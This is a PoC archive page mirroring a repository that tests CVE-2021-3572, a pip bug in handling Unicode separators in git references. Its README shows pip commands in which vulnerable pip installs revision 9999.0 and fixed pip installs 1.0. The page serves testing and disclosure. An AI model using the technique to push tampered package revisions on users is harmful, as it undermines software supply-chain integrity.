Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-3572 PoC — pip 输入验证错误漏洞

Source
https://github.com/frenzymadness/CVE-2021-3572
Associated Vulnerability
Title:pip 输入验证错误漏洞 (CVE-2021-3572)
Description:A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.
Description
A simple repository helping to test CVE-2021-3572 in PyPA/pip
Readme
# CVE-2021-3572

This repository is designed for testing CVE-2021-3572 in [pypa/pip](https://github.com/pypa/pip).

For more information, see these resources:
* CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572
* PR where vulnerability was fixed: https://github.com/pypa/pip/pull/9827
* Issue with more discussion: https://github.com/pypa/pip/issues/10042

Also, see the tags and first two commits in this repository.

## Testing

Vulnerable version of pip (<21.1) installs version 9999.0 but the fixed version installs the correct version 1.0:

### Vulnerable version

```
$ pip install "pip<21.1"
Successfully installed pip-21.0.1

$ pip install git+https://github.com/frenzymadness/CVE-2021-3572.git@original_version

$ pip list
Package       Version
------------- -------
cve-2021-3572 9999.0
pip           21.0.1
setuptools    56.2.0
wheel         0.36.2
```

### Fixed version

```
$ pip install -U pip
Successfully installed pip-21.1.2

$ pip install git+https://github.com/frenzymadness/CVE-2021-3572.git@original_version

$ pip list
Package       Version
------------- -------
cve-2021-3572 1.0
pip           21.1.2
setuptools    56.2.0
wheel         0.36.2
```
File Snapshot

 [4.0K]  /data/pocs/5ef2e0b2f3e27cdaec7dd58ff5c6981759bd18c2
├── [  19]  cve_2021_3572.py
├── [1.0K]  LICENSE
├── [1.2K]  README.md
└── [ 377]  setup.py

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →